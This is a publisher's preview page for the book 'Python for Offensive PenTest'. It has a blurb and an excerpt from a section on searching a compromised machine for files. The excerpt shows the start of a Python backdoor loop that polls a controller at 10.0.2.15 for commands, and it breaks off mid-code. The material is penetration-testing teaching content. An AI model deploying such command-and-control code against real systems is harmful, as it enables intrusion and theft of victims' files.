Book Image

Python for Offensive PenTest

By : Hussam Khrais
Book Image

Python for Offensive PenTest

By: Hussam Khrais

Overview of this book

Python is an easy-to-learn and cross-platform programming language that has unlimited third-party libraries. Plenty of open source hacking tools are written in Python, which can be easily integrated within your script. This book is packed with step-by-step instructions and working examples to make you a skilled penetration tester. It is divided into clear bite-sized chunks, so you can learn at your own pace and focus on the areas of most interest to you. This book will teach you how to code a reverse shell and build an anonymous shell. You will also learn how to hack passwords and perform a privilege escalation on Windows with practical examples. You will set up your own virtual hacking environment in VirtualBox, which will help you run multiple operating systems for your testing environment. By the end of this book, you will have learned how to code your own scripts and mastered ethical hacking from scratch.
Table of Contents (13 chapters)
Title Page
Copyright and Credits
Packt Upsell
Contributors
Preface
Index

Replicating Metasploit searching for content


We will now code a Python function that will search into target directories and provide us with a list of file locations for a certain specific file extension. For instance, say we need to search for a PDF or document file on the target machine; instead of checking each directory, we will add a new function to automatically do the job for us. This is very useful when you first land in a target machine and try to explore as much data as possible such as documents, PDF files, and so on. The coding part is quite easy. We will use the Python os library to do the job for us. So, as usual, I have added a new if statement to specify that if we get a search keyword we will do the following:

# Python For Offensive PenTest

# Searching for Content

import requests 
import subprocess 
import os
import time

while True: 

    req = requests.get('http://10.0.2.15')
    command = req.text

    if 'terminate' in command:
        break 

    elif 'grab' in command...